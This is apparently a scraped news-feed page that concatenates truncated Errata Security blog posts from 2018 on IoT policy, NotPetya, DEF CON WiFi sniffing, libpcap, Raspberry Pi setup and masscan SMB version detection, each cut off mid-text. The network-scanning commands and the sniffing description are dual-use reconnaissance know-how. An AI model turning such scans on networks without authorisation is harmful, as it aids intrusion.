"bridge" mode (as I always do anyway), and setting an alternate IP address:# ifconfig eth:1 192.168.8.2 255.255.255.0The firmware I want to install is from the OpenWRT project which maintains Linux firmware replacements for over a hundred different devices. The device actually already uses their own variation of OpenWRT, but still, rather than futz with theirs I want to go with  a vanilla installation.https://wiki.openwrt.org/toh/gl-inet/gl-ar150I download this using the browser in my Linux VM, then browse to 19]]> 2018-09-28T18:52:32+00:00 https://blog.erratasec.com/2018/09/mini-pwning-with-gl-inet-ar150.html www.secnews.physaphae.fr/article.php?IdArticle=825944 False None None None Errata Security - Errata Security California\'s bad IoT law an IoT security bill, awaiting the government's signature/veto. It's a typically bad bill based on a superficial understanding of cybersecurity/hacking that will do little improve security, while doing a lot to impose costs and harm innovation.It's based on the misconception of adding security features. It's like dieting, where people insist you should eat more kale, which does little to address the problem you are pigging out on potato chips. The key to dieting is not eating more but eating less. The same is true of cybersecurity, where the point is not to add “security features” but to remove “insecure features”. For IoT devices, that means removing listening ports and cross-site/injection issues in web management. Adding features is typical “magic pill” or “silver bullet” thinking that we spend much of our time in infosec fighting against.We don't want arbitrary features like firewall and anti-virus added to these products. It'll just increase the attack surface making things worse. The one possible exception to this is “patchability”: some IoT devices can't be patched, and that is a problem. But even here, it's complicated. Even if IoT devices are patchable in theory there is no guarantee vendors will supply such patches, or worse, that users will apply them. Users overwhelmingly forget about devices once they are installed. These devices aren't like phones/laptops which notify users about patching.You might think a good solution to this is automated patching, but only if you ignore history. Many rate “NotPetya” as the worst, most costly, cyberattack ever. That was launched by subverting an automated patch. Most IoT devices exist behind firewalls, and are thus very difficult to hack. Automated patching gets beyond firewalls; it makes it much more likely mass infections will result from hackers targeting the vendor. The Mirai worm infected fewer than 200,000 devices. A hack of a tiny IoT vendor can gain control of more devices than that in one fell swoop.The bill does target one insecure feature that should be removed: hardcoded passwords. But they get the language wrong. A device doesn't have a single password, but many things that may or may not be called passwords. A typical IoT device has one system for creating accounts on the web management interface, a wholly separate authentication system for services like Telnet (based on /etc/passwd), and yet a wholly separate system for things like debugging interfaces. Just because a device does the proscribed thing of using a unique or user generated password in the user interface doesn't mean it doesn't also have a bug in Telnet.That was the problem with devices infected by Mirai. The description that these were hardcoded passwords is only a superficial understanding of the problem. The real problem was that there were different authentication systems in the web interface and in other services like Telnet. Most of the devices vulnerable to Mirai did the right thing on the web interfaces (meeting the language of this law) requiring the user to create new passwords before operating. They just did the wrong thing elsewhere.People aren't really paying attention to what happened with Mirai. They look at the 20 billion new IoT devices that are going to be connected to the Internet by 2020 and believe Mirai is just the tip of the iceberg. But it isn't. The IPv4 Internet has only 4 billion addresses, which are pretty much already used up. This means those 20 billion won't be exposed to the public Internet like Mirai devices, but hidden behind firewalls that translate addresses. Thus, rather than Mirai presaging the future, it represents the last gasp of the past that is unlikely to come again.This law is backwards looking rather than forward looking. Forward looking, by far the most important t]]> 2018-09-10T17:33:17+00:00 https://blog.erratasec.com/2018/09/californias-bad-iot-law.html www.secnews.physaphae.fr/article.php?IdArticle=802142 False Hack,Threat,Patching,Guideline Tesla,NotPetya None Errata Security - Errata Security Debunking Trump\'s claim of Google\'s SOTU bias #StopTheBias pic.twitter.com/xqz599iQZw- Donald J. Trump (@realDonaldTrump) August 29, 2018The evidence still exists at the Internet Archive (aka. "Wayback Machine") that archives copies of websites. That was probably how that Trump video was created, by using that website. We can indeed see that for Obama's SotU speeches, Google promoted them, such as this example of his January 12, 2016 speech:And indeed, if we check for Trump's January 30, 2018 speech, there's no such promotion on Google's homepage:But wait a minute, Google claims they did promote it, and there's even a screenshot on Reddit proving Google is telling the truth. Doesn't this disprove Trump?No, it actually doesn't, at least not yet. It's comparing two different things. In the Obama example, Google promoted hours ahead of time that there was an upcoming event. In the Trump example, they didn't do that. Only once the event went live did they mention it.I failed to notice this in my examples above because the Wayback Machine uses GMT timestamps. At 9pm EST when Trump gave his speech, it was 2am the next day in GMT. So picking the Wayback page from January 31st we do indeed see the promotion of the live event.Thus, Trump still seems to have a point: Google promoted Obama's speech better. They promoted his speeches hours ahead of time, but Trump's only after they went live.But ho]]> 2018-08-29T22:22:49+00:00 https://blog.erratasec.com/2018/08/debunking-trumps-claim-of-googles-sotu.html www.secnews.physaphae.fr/article.php?IdArticle=785218 False None None None Errata Security - Errata Security Provisioning a headless Raspberry Pi Burning micro SD cardWe are going to edit the SD card before booting, so for completeness, I thought I'd describe the process of burning an SD card.We are going to download the latest "raspbian" operating system. I download the "lite" version because I'm not using the desktop features. It comes as a compressed .zip file which we need to extract into an .img file. Just double-click on the .zip on Windows or Mac.The next step is to burn the image to an SD card. On Windows I use Win32DiskImager. On Mac I use the following command-line steps:$ sudo -s# mount# diskutil unmount /dev/disk2s1# dd bs=1m if=~/Downloads/2018-06-27-raspbian-stretch-lite.img of=/dev/disk2 conv=syncFirst, I need a root prompt. I then use the mount command to find out where the micro SD card is mounted in the file system. It's usually /dev/disk2s1, but could be disk3 or disk4 depending upon other things that may already be mounted on my Mac, such as USB drives or dmg files. It's important to know the correct drive because the dd utility is unforgiving of mistakes and can wipe out your entire drive. For gosh's sake, don't use disk1!!!! Remember dd stands for danger-danger (well, many claim it stands for disk-dump, but seriously, it's dangerous).The next step is to unmount the drive. Instead of the Unix umount utility use the diskutil unmount macOS tool.Now we use good ol' dd to copy the image over. The above example is my recently download raspbian image that's two months old. When you do this, it'll be a newer version with a different file name, so look in your ~/Downloads folder for the correct name.This takes a while to write to the SD card. You can type [ctrl-T] to see progress if you want.When we are done writing, don't eject the card. We are going to edit the contents as described below before we stick it into our Raspberry Pi. After running dd, it's going to become automatically mounted on your Mac, on mine it comes up as /Volumes/boot. When I say "root directory of the SD card" in the instructions below, I mean that directory.Troubleshooting: If you get the "Resource busy" error when running dd, it means you didn't unmount the drive. Go back and run diskutil unmount /dev/disk2s1 (or equivalent for whatever mount tell you which drive the SD card is using).You can use the "raw" disk instead of normal disk, such as /dev/rdisk2. I don't know what the tradeoffs are.EthernetThe RPi B comes with Ethernet built-in]]> 2018-08-27T01:56:09+00:00 https://blog.erratasec.com/2018/08/provisioning-headless-raspberry-pi.html www.secnews.physaphae.fr/article.php?IdArticle=783004 False Guideline None None Errata Security - Errata Security DeGrasse Tyson: Make Truth Great Again August 20, 2018When people make comparisons with Orwell's "Ministry of Truth", he obtusely persists:A good start:  The National Academy of Sciences, which “…provides objective, science-based advice on critical issues affecting the nation."- Neil deGrasse Tyson (@neiltyson) August 20, 2018Given that Orwellian dystopias were the theme of this summer's DEF CON hacker conference, let's explore what's wrong with this idea.Truth vs. "Truth"I work in a corrupted industry, variously known as the "infosec" community or "cybersecurity" industry. It's a great example of how truth is corrupted into "Truth".At a recent government policy meeting, I pointed out how vendors often downplay the risk of bugs (vulnerabilities that can be exploited by hackers). When vendors are notified of these bugs and release a patch to fix them, they often give a risk rating. These ratings are often too low, in order to protect the corporate reputation. The representative from Oracle claimed that they didn't do that, and that indeed, they'll often overestimate the risk. Other vendors chimed in, also claiming they rated the risk higher than it really was.In a neutral world, deliberately overestimating the risk would be the same falsehood as deliberately underestimating it. But we live in a non-neutral world, where only one side is a lie, the middle is truth, and the other side is "Truth". Lying in the name of the "Truth" is somehow acceptable.Moreover, Oracle is famous for having downplayed the risk of significant bugs in the past, and is well-known in the industry as being the least trustworthy vendor as far as security of their products is concerned. Much of their policy efforts in Washington D.C. are focused on preventing their dirty laundry from being exposed. They aren't simply another vendor promoting "Truth", but a deliberately exploiting "Truth" to corrupt ends.That we should exaggerate the risks of cybersecurity, deliberately lie to people for their own good, is the uncontroversial consensus of our infosec/cybersec community. Most do it, few think this is wrong. Security is a moral imperative that justifies "Truth".The National Academy of ScientistsSo are we getting the truth or "Truth" from organizations like the National Academy of Scientists?The question here isn't global warming. That mankind's carbon emissions warms the climate is truth. We have a good understanding of how greenhouse gases work, as well as many measures of the climate showing that warming is occurring. The Arctic is steadily losing ice each summer.Instead, the question is "Global Warming", the claims made by politicians on the subject. Do politicians on the left fairly represent the truth, or are they the "Truth"?Which side is the National Academy of Sciences on? Are they committed to the truth, or (like the infosec/cybersec community) are they pursuing "Truth"? Is global warming a moral imperative that justifies playing loose with the facts?Googling "national academy of sciences climate chang]]> 2018-08-20T16:06:46+00:00 https://blog.erratasec.com/2018/08/degrasse-tyson-make-truth-great-again.html www.secnews.physaphae.fr/article.php?IdArticle=782647 False Guideline APT 32 None Errata Security - Errata Security That XKCD on voting machine software is wrong Accidents vs. attackThe biggest flaw is that the comic confuses accidents vs. intentional attack. Airplanes and elevators are designed to avoid accidental failures. If that's the measure, then voting machine software is fine and perfectly trustworthy. Such machines are no more likely to accidentally record a wrong vote than the paper voting systems they replaced -- indeed less likely. The reason we have electronic voting machines in the first place was due to the "hanging chad" problem in the Bush v. Gore election of the year 2000. After that election, a wave of new, software-based, voting machines replaced the older inaccurate paper machines.The question is whether software voting machines can be attacked. Well, if that's the measure, then airplanes aren't safe at all. Security against human attack consists of the entire infrastructure outside the plane, such as TSA forcing us to take off our shoes, to trade restrictions to prevent the proliferation of Stinger missiles.Confusing the two, accidents vs. attack, is used here because it makes the reader feel superior. We get to mock and feel superior to those stupid software engineers for not living up to what's essentially a fictional standard of reliability.To repeat: software is better than the mechanical machines they replaced, which is why there are so many software-based machines in the United States. The issue isn't normal accuracy, but their robustness against a different standard, against attack -- a standard which airplanes and elevators suck at.The problems are as much hardware as softwareLast year at the DEF CON hacking conference they had an "Election Hacking Village" where they hacked a number of electronic voting machines. Most of those "hacks" were against the hardware, such as soldering on a JTAG device or accessing USB ports. Other errors have been voting machines being sold on eBay whose data wasn't wiped, allowing voter records to be recovered.What we want to see is hardware designed more like an iPhone, where the FBI can't decrypt a phone even when they really really want to. This requires special chips, such as secure enclaves, signed boot loaders, and so on. Only once we get the hardware right can we complain about the software being deficient.To be fair, software problems were also found at DEF CON, like an exploit over WiFi. Though, a lot of problems are questionable whether the fault lies in the software design or the hardware design, fixable in either one. The situation is better described as the entire design being flawed, from the "requirements",  to the high-level system "architecture", and lastly to the actual "software" code.It's lack of accountability/fail-safesWe imagine the threat is that votes can be changed in the voting machine, but it's more profound than that. The problem is that votes can be changed invisibly. The first change experts want to see is adding a paper trail, rather than fixing bugs.Consider "recounts". With many of today's electronic voting machines, this is meaningless, with nothing to recount. The machine produces a number, and we have nothing else to test against whether that number is correct or fa]]> 2018-08-08T20:09:17+00:00 https://blog.erratasec.com/2018/08/that-xkcd-on-voting-machine-software-is.html www.secnews.physaphae.fr/article.php?IdArticle=771991 False Hack,Threat None None Errata Security - Errata Security What the Caesars (@DefCon) WiFi situation looks like When we go to DEF CON in Vegas, hundreds of us bring our WiFi tools to look at the world. Actually, no special hardware is necessary, as modern laptops/phones have WiFi built-in, while the operating system (Windows, macOS, Linux) enables “monitor mode”. Software is widely available and free. We still love our specialized WiFi dongles and directional antennas, but they aren't really needed anymore.It's also legal, as long as you are just grabbing header information and broadcasts. Which is about all that's useful anymore as encryption has become the norm -- we can pretty much only see what we are allowed to see. The days of grabbing somebody's session-cookie and hijacking their web email are long gone (though the was a fun period). There are still a few targets around if you want to WiFi hack, but most are gone.So naturally I wanted to do a survey of what Caesar's Palace has for WiFi during the DEF CON hacker conference located there.Here is a list of access-points (on channel 1 only) sorted by popularity, the number of stations using them. These have mind-blowing high numbers in the ~3000 range for “CAESARS”. I think something is wrong with the data.I click on the first one to drill down, and I find a source of the problem. I'm seeing only “Data Out” packets from these devices, not “Data In”.These are almost entirely ARP packets from devices, associated with other access-points, not actually associated with this access-point. The hotel has bridged (via Ethernet) all the access-points together. We can see this in the raw ARP packets, such as the one shown below:WiFi packets have three MAC addresses, the source and destination (as expected) and also the address of the access-point involved. The access point is the actual transmitter, but it's bridging the packet from some other location on the local Ethernet network.Apparently, CAESARS dumps all the guests into the address range 10.10.x.x, all going out through the router 10.10.0.1. We can see this from the ARP traffic, as everyone seems to be ARPing that router.I'm probably seeing all the devices on the CAESARS WiFi. In ot]]> 2018-08-07T23:18:45+00:00 https://blog.erratasec.com/2018/08/what-caesars-defcon-wifi-situation.html www.secnews.physaphae.fr/article.php?IdArticle=770525 False Patching None None Errata Security - Errata Security Some changes in how libpcap works you should know Traditionally, you'd open an adapter with pcap_open(), whose function parameters set options like snap length, promiscuous mode, and timeouts.However, in newer versions of the API, what you should do instead is call pcap_create(), then set the options individually with calls to functions like pcap_set_timeout(), then once you are ready to start capturing, call pcap_activate().I mention this in relation to "TPACKET" and pcap_set_immediate_mode().Over the years, Linux has been adding a "ring buffer" mode to packet capture. This is a trick where a packet buffer is memory mapped between user-space and kernel-space. It allows a packet-sniffer to pull packets out of the driver without the overhead of extra copies or system calls that cause a user-kernel space transition. This has gone through several generations.One of the latest generations causes the pcap_next() function to wait forever for a packet. This happens a lot on virtual machines where there is no background traffic on the network.This looks like a bug, but maybe it isn't.  It's unclear what the "timeout" parameter actually means. I've been hunting down the documentation, and curiously, it's not really described anywhere. For an ancient, popular APIs, libpcap is almost entirely undocumented as to what it precisely does. I've tried reading some of the code, but I'm not sure I've come to any understanding.In any case, the way to resolve this is to call the function pcap_set_immediate_mode(). This causes libpccap to backoff and use an older version of TPACKET such that it'll work as expected, that even on silent networks the pcap_next() function will timeout and return.I mention this because I fixed this bug in my code. When running inside a VM, my program would never exit. I changed from pcap_open_live() to the pcap_create()/pcap_activate() method instead, adding the setting of "immediate mode", and now things work. Performance seems roughly the same as far as I can tell.I'm still not certain what's going on here, and there are even newer proposed zero-copy/ring-buffer modes being added to the Linux kernel, so this can change in the future. But in any case, I thought I'd document this in a blogpost in order to help out others who might be encountering the same problem.]]> 2018-07-27T16:55:05+00:00 https://blog.erratasec.com/2018/07/some-changes-in-how-libpcap-works-you.html www.secnews.physaphae.fr/article.php?IdArticle=757269 False None None None Errata Security - Errata Security Your IoT security concerns are stupid recent effort. They are usually wrong. It's a typical cybersecurity policy effort which knows the answer without paying attention to the question.Patching has little to do with IoT security. For one thing, consumers will not patch vulns, because unlike your phone/laptop computer which is all "in your face", IoT devices, once installed, are quickly forgotten. For another thing, the average lifespan of a device on your network is at least twice the duration of support from the vendor making patches available.Naive solutions to the manual patching problem, like forcing autoupdates from vendors, increase rather than decrease the danger. Manual patches that don't get applied cause a small, but manageable constant hacking problem. Automatic patching causes rarer, but more catastrophic events when hackers hack the vendor and push out a bad patch. People are afraid of Mirai, a comparatively minor event that led to a quick cleansing of vulnerable devices from the Internet. They should be more afraid of notPetya, the most catastrophic event yet on the Internet that was launched by subverting an automated patch of accounting software.Vulns aren't even the problem. Mirai didn't happen because of accidental bugs, but because of conscious design decisions. Security cameras have unique requirements of being exposed to the Internet and needing a remote factory reset, leading to the worm. While notPetya did exploit a Microsoft vuln, it's primary vector of spreading (after the subverted update) was via misconfigured Windows networking, not that vuln. In other words, while Mirai and notPetya are the most important events people cite supporting their vuln/patching policy, neither was really about vuln/patching.Such technical analysis of events like Mirai and notPetya are ignored. Policymakers are only cherrypicking the superficial conclusions supporting their goals. They assiduously ignore in-depth analysis of such things because it inevitably fails to support their positions, or directly contradicts them.IoT security is going to be solved regardless of what government does. All this policy talk is premised on things being static unless government takes action. This is wrong. Government is still waffling on its response to Mirai, but the market quickly adapted. Those off-brand, poorly engineered security cameras you buy for $19 from Amazon.com shipped directly from Shenzen now look very different, having less Internet exposure, than the ones used in Mirai. Major Internet sites like Twitter now use multiple DNS providers so that a DDoS attack on one won't take down their services.In addition, technology is fundamentally changing. Mirai attacked IPv4 addresses outside the firewall. The 100-billion IoT devices going on the network in the next decade will not work this way, cannot work this way, because there are only 4-billion IPv4 addresses. Instead, they'll be behind NATs or accessed via IPv6, both of which prevent Mirai-style worms from functioning. Your fridge and toaster won't connect via your home WiFi anyway, but via a 5G chip unrelated to your home.Lastly, focusing on the ven]]> 2018-07-12T19:54:20+00:00 https://blog.erratasec.com/2018/07/your-iot-security-concerns-are-stupid.html www.secnews.physaphae.fr/article.php?IdArticle=742946 False Hack,Patching,Guideline NotPetya None Errata Security - Errata Security Lessons from nPetya one year later An example is this quote in a recent article:"One year on from NotPetya, it seems lessons still haven't been learned. A lack of regular patching of outdated systems because of the issues of downtime and disruption to organisations was the path through which both NotPetya and WannaCry spread, and this fundamental problem remains." This is an attractive claim. It describes the problem in terms of people being "weak" and that the solution is to be "strong". If only organizations where strong enough, willing to deal with downtime and disruption, then problems like this wouldn't happen.But this is wrong, at least in the case of NotPetya.NotPetya's spread was initiated through the Ukraining company MeDoc, which provided tax accounting software. It had an auto-update process for keeping its software up-to-date. This was subverted in order to deliver the initial NotPetya infection. Patching had nothing to do with this. Other common security controls like firewalls were also bypassed.Auto-updates and cloud-management of software and IoT devices is becoming the norm. This creates a danger for such "supply chain" attacks, where the supplier of the product gets compromised, spreading an infection to all their customers. The lesson organizations need to learn about this is how such infections can be contained. One way is to firewall such products away from the core network. Another solution is port-isolation/microsegmentation, that limits the spread after an initial infection.Once NotPetya got into an organization, it spread laterally. The chief way it did this was through Mimikatz/PsExec, reusing Windows credentials. It stole whatever login information it could get from the infected machine and used it to try to log on to other Windows machines. If it got lucky getting domain administrator credentials, it then spread to the entire Windows domain. This was the primary method of spreading, not the unpatched ETERNALBLUE vulnerability. This is why it was so devastating to companies like Maersk: it wasn't a matter of a few unpatched systems getting infected, it was a matter of losing entire domains, including the backup systems.Such spreading through Windows credentials continues to plague organizations. A good example is the recent ransomware infection of the City of Atlanta that spread much the same way. The limits of the worm were the limits of domain trust relationships. For example, it didn't infect the city airport because that Windows domain is separate from the city's domains.This is the most pressing lesson organizations need to learn, the one they are ignoring. They need to do more to prevent desktops from infecting each other, such as through port-isolation/microsegmentation. They need to control the spread of administrative credentials within the organization. A lot of organizations put the same local admin account on every workstation which makes the spread of NotPetya style worms trivial. They need to reevaluate trust relationships between domains, so that the admin of one can't infect the others.These solutions are difficult, which is why news articles don't mention them. You don't have to know anything about security to proclaim "the problem is lack of patches". It's moral authority, chastising the weak, rather than a proscription of what to do. Solving supply chain hacks and Windows credential sharing, though, is hard. I don't know any universal solution to this -- I'd have to thoroughly analyze your network and business in order to ]]> 2018-06-27T15:49:15+00:00 https://blog.erratasec.com/2018/06/lessons-from-npetya-one-year-later.html www.secnews.physaphae.fr/article.php?IdArticle=725976 False Ransomware,Malware,Patching NotPetya,FedEx,Wannacry None Errata Security - Errata Security SMB version detection in masscan For example, running masscan in my local bar, I get the following result:Banner on port 445/tcp on 10.1.10.200: [smb] SMBv1  time=2018-06-24 22:18:13 TZ=+240  domain=SHIPBARBO version=6.1.7601 ntlm-ver=15 domain=SHIPBARBO name=SHIPBARBO domain-dns=SHIPBARBO name-dns=SHIPBARBO os=Windows Embedded Standard 7601 Service Pack 1 ver=Windows Embedded Standard 6.1The top version string comes from NTLMSSP, with 6.1.7601, which means Windows 6.1 (Win7) build number 7601. The bottom version string comes from the SMBv1 packets, which consists of strings.The nmap and smbclient programs will get the SMBv1 part, but not the NTLMSSP part.This seems to be a problem with Rapid7's "National Exposure Index" which tracks SMB exposure (amongst other things). It's missing about 300,000 machines that report NT_STATUS_ACCESS_DENIED from smbclient rather than the numeric version info from NTLMSSP authentication.The smbclient information does have the information internally. For example, you could run the following command to put the debug level at '10' to grab it:$ smbclient -U "" -N -L 10.1.10.95 -d10You'll get something like the following output:It appears to get the Windows 6.1 numbers, though for some reason it's missing the build number.To run masscan to grab this, run:# masscan --banners -p445 10.1.10.95In the above example, I also used the "--hello smbv1" parameter, to grab both the SMBv1 and NTLMSSP version info. Otherwise, it'll default to SMBv2 if available, and only return:]]> 2018-06-24T19:39:21+00:00 https://blog.erratasec.com/2018/06/smb-version-detection-in-masscan.html www.secnews.physaphae.fr/article.php?IdArticle=720967 False Tool None None Errata Security - Errata Security Notes on "The President is Missing" This "news analysis" piece in the New York Times is a good example, coming up with policy recommendations based on fictional cliches rather than a reality of what hackers do.The cybervirus in the book is some all powerful thing, able to infect everything everywhere without being detected. This is fantasy no more real than magic and faeries. Sure, magical faeries is a popular basis for fiction, but in this case, it's lazy fantasy, a cliche. In fiction, viruses are rarely portrayed as anything other than all powerful.But in the real world, viruses have important limitations. If you knew anything about computer viruses, rather than being impressed by what they can do, you'd be disappointed by what they can't.Go look at your home router. See the blinky lights. The light flashes every time a packet of data goes across the network. Packets can't be sent without a light blinking. Likewise, viruses cannot spread themselves over a network, or communicate with each other, without somebody noticing -- especially a virus that's supposedly infected a billion devices as in the book.The same is true of data on the disk. All the data is accounted for. It's rather easy for professionals to see when data (consisting of the virus) has been added. The difficulty of anti-virus software is not in detecting when something new has been added to a system, but automatically determining whether it's benign or malicious. When viruses are able to evade anti-virus detection, it's because they've been classified as non-hostile, not because they are invisible.Such evasion only works when hackers have a focused target. As soon as a virus spreads too far, anti-virus companies will get a sample, classify as malicious, and spread the "signatures" out to the world. That's what happened with Stuxnet, a focused attack on Iran's nuclear enrichment program that eventually spread too far and got detected. It's implausible that anything can spread to a billion systems without anti-virus companies getting a sample and correctly classifying it.In the book, the president creates a team of the 30 brightest cybersecurity minds the country has, from government, the private sector, and even convicted hackers on parole from jail -- each more brilliant than the last. This is yet another lazy cliche about genius hackers.The cliche comes from the fact that it's rather easy to impress muggles with magic tricks. As soon as somebody shows an ability to do something you don't know how to do, they become a cyber genius in your mind. The reality is that cybersecurity/hacking is no different than any other profession, no more dominated by "genius" than bridge engineering or heart surgery. It's a skill that takes both years of study as well as years of experience.So whenever the president, ignorant of computers, puts together a team of 30 cyber geniuses, they aren't going to be people of competence. They are going to be people good at promoting themselves, taking credit for other people's work, or political engineering. They won't be technical experts, they'll be people like Rudi Giuliani or Richard Clarke, who have been tapped by presidents as cyber experts despite knowing less than nothing about computers.A funny example of this is Marcus Hutchins. He's a virus researcher of typical skill and experience, but was catapulted to fame by finding the "kill switch" in the famous Wannacry virus. In truth, he just got lucky, being just the first to find the kill switch that would've soon been found by ano]]> 2018-06-17T01:45:55+00:00 https://blog.erratasec.com/2018/06/notes-on-president-is-missing.html www.secnews.physaphae.fr/article.php?IdArticle=708628 False None Wannacry None Errata Security - Errata Security The First Lady\'s bad cyber advice help children go online safely. It has problems.Melania's guide is full of outdated, impractical, inappropriate, and redundant information. But that's allowed, because it relies upon moral authority: to be moral is to be secure, to be moral is to do what the government tells you. It matters less whether the advice is technically accurate, and more that you are supposed to do what authority tells you.That's a problem, not just with her guide, but most cybersecurity advice in general. Our community gives out advice without putting much thought into it, because it doesn't need thought. You should do what we tell you, because being secure is your moral duty.This post picks apart Melania's document. The purpose isn't to fine-tune her guide and make it better. Instead, the purpose is to demonstrate the idea of resting on moral authority instead of technical authority.Strong Passwords"Strong passwords" is the quintessential cybersecurity cliché that insecurity is due to some "weakness" (laziness, ignorance, greed, etc.) and the remedy is to be "strong".The first flaw is that this advice is outdated. Ten years ago, important websites would frequently get hacked and have poor password protection (like MD5 hashing). Back then, strength mattered, to stop hackers from brute force guessing the hacked passwords. These days, important websites get hacked less often and protect the passwords better (like salted bcrypt). Moreover, the advice is now often redundant: websites, at least the important ones, enforce a certain level of password complexity, so that even without advice, you'll be forced to do the right thing most of the time.This advice is outdated for a second reason: hackers have gotten a lot better at cracking passwords. Ten years ago, they focused on brute force, trying all possible combinations. Partly because passwords are now protected better, dramatically reducing the effectiveness of the brute force approach, hackers have had to focus on other techniques, such as the mutated dictionary and Markov chain attacks. Consequently, even though "Password123!" seems to meet the above criteria of a strong password, it'll fall quickly to a mutated dictionary attack. The simple recommendation of "strong passwords" is no longer sufficient.The last part of the above advice is to avoid password reuse. This is good advice. However, this becomes impractical advice, especially when the user is trying to create "strong" complex passwords as described above. There's no way users/children can remember that many passwords. So they aren't going to follow that advice.To make the advice work, you need to help users with this problem. To begin with, you need to tell them to write down all their passwords. This is something many people avoid, because they've been told to be "strong" and writing down passwords seems "weak". Indeed it is, if you write them down in an office environment and stick them on a note on the monitor or underneath the keyboard. But they are safe and strong if it's on paper stored in your home safe, or even in a home office drawer. I write my passwords on the margins in a ]]> 2018-05-31T17:06:26+00:00 https://blog.erratasec.com/2018/05/the-first-ladys-bad-cyber-advice.html www.secnews.physaphae.fr/article.php?IdArticle=685468 False None None None Errata Security - Errata Security The devil wears Pravda Musk has a point. Journalists do suck, and many suck consistently. I see this in my own industry, cybersecurity, and I frequently criticize them for their suckage.But what he's doing here is not correcting them when they make mistakes (or what Musk sees as mistakes), but questioning their legitimacy. This legitimacy isn't measured by whether they follow established journalism ethics, but whether their "core truths" agree with Musk's "core truths".An example of the problem is how the press fixates on Tesla car crashes due to its "autopilot" feature. Pretty much every autopilot crash makes national headlines, while the press ignores the other 40,000 car crashes that happen in the United States each year. Musk spies on Tesla drivers (hello, classic Bond villain everyone) so he can see the dip in autopilot usage every time such a news story breaks. He's got good reason to be concerned about this.He argues that autopilot is safer than humans driving, and he's got the statistics and government studies to back this up. Therefore, the press's fixation on Tesla crashes is illegitimate "fake news", titillating the audience with distorted truth.But here's the thing: that's still only Musk's version of the truth. Yes, on a mile-per-mile basis, autopilot is safer, but there's nuance here. Autopilot is used primarily on freeways, which already have a low mile-per-mile accident rate. People choose autopilot only when conditions are incredibly safe and drivers are unlikely to have an accident anyway. Musk is therefore being intentionally deceptive comparing apples to oranges. Autopilot may still be safer, it's just that the numbers Musk uses don't demonstrate this.And then there is the truth calling it "autopilot" to begin with, because it isn't. The public is overrating the capabilities of the feature. It's little different than "lane keeping" and "adaptive cruise control" you can now find in other cars. In many ways, the technology is behind -- my Tesla doesn't beep at me when a pedestrian walks behind my car while backing up, but virtually every new car on the market does.Yes, the press unduly covers Tesla autopilot crashes, but Musk has only himself to blame by unduly exaggerating his car's capabilities by calling it "autopilot".What's "core truth" is thus rather difficult to obtain. What the press satisfies itself with instead is smaller truths, what they can document. The facts are in such cases that the accident happened, and they try to get Tesla or Musk to comment on it.What you can criticize a journalist for is therefore not "core truth" but whether they did journalism correctly. When such stories criticize "autopilot", but don't do their diligence in getting Tesla's side of the story, then that's a violation of journalistic practice. When I criticize journalists for their poor handling of stories in my industry, I try to focus on which journalistic principles they get wrong. For example, the NYTimes reporters do a lot of stories quoting anonymous government sources in clear violation of journalistic principles.If "credibility" is the concern, then it's the classic Bond villain h]]> 2018-05-23T18:45:27+00:00 https://blog.erratasec.com/2018/05/the-devil-wears-pravda.html www.secnews.physaphae.fr/article.php?IdArticle=668560 False None Tesla None Errata Security - Errata Security C is too low level x86 machine code is a high-level language, but this article claiming C is a not a low level language is bunk. C certainly has some problems, but it's still the closest language to assembly. This is obvious by the fact it's still the fastest compiled language. What we see is a typical academic out of touch with the real world.The author makes the (wrong) observation that we've been stuck emulating the PDP-11 for the past 40 years. C was written for the PDP-11, and since then CPUs have been designed to make C run faster. The author imagines a different world, such as where CPU designers instead target something like LISP as their preferred language, or Erlang. This misunderstands the state of the market. CPUs do indeed supports lots of different abstractions, and C has evolved to accommodate this.The author criticizes things like "out-of-order" execution which has lead to the Spectre sidechannel vulnerabilities. Out-of-order execution is necessary to make C run faster. The author claims instead that those resources should be spent on having more slower CPUs, with more threads. This sacrifices single-threaded performance in exchange for a lot more threads executing in parallel. The author cites Sparc Tx CPUs as his ideal processor.But here's the thing, the Sparc Tx was a failure. To be fair, it's mostly a failure because most of the time, people wanted to run old C code instead of new Erlang code. But it was still a failure at running Erlang.Time after time, engineers keep finding that "out-of-order", single-threaded performance is still the winner. A good example is ARM processors for both mobile phones and servers. All the theory points to in-order CPUs as being better, but all the products are out-of-order, because this theory is wrong. The custom ARM cores from Apple and Qualcomm used in most high-end phones are so deeply out-of-order they give Intel CPUs competition. The same is true on the server front with the latest Qualcomm Centriq and Cavium ThunderX2 processors, deeply out of order supporting more than 100 instructions in flight.The Cavium is especially telling. Its ThunderX CPU had 48 simple cores which was replaced with the ThunderX2 having 32 complex, deeply out-of-order cores. The performance increase was massive, even on multithread-friendly workloads. Every competitor to Intel's dominance in the server space has learned the lesson from Sparc Tx: many wimpy cores is a failure, you need fewer beefy cores. Yes, they don't need to be as beefy as Intel's processors, but they need to be close.Even Intel's "Xeon Phi" custom chip learned this lesson. This is their GPU-like chip, running 60 cores with 512-bit wide "vector" (sic) instructions, designed for supercomputer applications. Its first version was purely in-order. Its current version is slightly out-of-order. It supports four threads and focuses on basic number crunching, so in-order cores seems to be the right approach, but Intel found in this case that out-of-order processing still provided a benefit. Practice is different than theory.As an academic, the author of the above article focuses on abstractions. The criticism of C is that it has the wrong abstractions which are hard to optimize, and that if we instead expressed things in the right abstractions, it would be easier to optimize.This is an intellectually compelling argument, but so far bunk.The reason is that while the theoretical base language has issues, everyone programs using extensions to the language, like "intrinsics" (C 'functions' that map to assembly instructions). Programmers write libraries using these intrinsics, which then the rest of the normal programmers use. In other words, if your criticism is that C is not itself low level enou]]> 2018-05-23T14:39:01+00:00 https://blog.erratasec.com/2018/05/c-is-too-low-level.html www.secnews.physaphae.fr/article.php?IdArticle=668267 False Guideline None None Errata Security - Errata Security masscan, macOS, and firewall Note that we are talking about the "packet-filter" firewall feature here. Remember that macOS, like most operating systems these days, has two separate firewalls: an application firewall and a packet-filter firewall. The application firewall is the one you see in System Settings labeled "Firewall", and it controls things based upon the application's identity rather than by which ports it uses. This is normally "on" by default. The packet-filter is normally "off" by default and is of little use to normal users.Also note that macOS changed packet-filters around version 10.10.5 ("Yosemite", October 2014). The older one is known as "ipfw", which was the default firewall for FreeBSD (much of macOS is based on FreeBSD). The replacement is known as PF, which comes from OpenBSD. Whereas you used to use the old "ipfw" command on the command line, you now use the "pfctl" command, as well as the "/etc/pf.conf" configuration file.What we need to filter is the source port of the packets that masscan will send, so that when replies are received, they won't reach the operating-system stack, and just go to masscan instead. To do this, we need find a range of ports that won't conflict with the operating system. Namely, when the operating system creates outgoing connections, it randomly chooses a source port within a certain range. We want to use masscan to use source ports in a different range.To figure out the range macOS uses, we run the following 